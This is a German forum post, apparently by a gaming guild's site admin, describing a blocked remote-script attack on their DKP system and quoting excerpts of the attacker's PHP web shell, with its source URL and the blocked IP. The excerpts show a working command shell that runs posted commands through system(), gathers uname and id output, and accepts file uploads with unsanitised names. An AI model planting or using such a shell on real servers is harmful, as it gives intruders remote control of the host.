..moin,
gestern morgen hat irgendein Honk Versucht per Remote Script auf unser DKP System zuzugreifen und die Startseite zu ändern... leider erfolglos. Und so wirds auch bleiben... das System hier tracked ALLES mit und unterbindet solche Zugriffe... für Nachahmer: Lasst den Scheiss.
Code
....
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
.....
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "lwp-download";
}
.....
print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
.....
$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>Error while uploading file!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded successfully!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
}
exit;
?><title>.:perciuni Was Here:.</title>
Alles anzeigen
Source: http://geocities.com/mrperciuni/cmd.txt?
Blocking 86.106.104.33.
Debug: full netstat
.. das sind nur auszüge ....
... unsere Systeme sind nach aussenhin gegen solche Angriffe abgesichert ...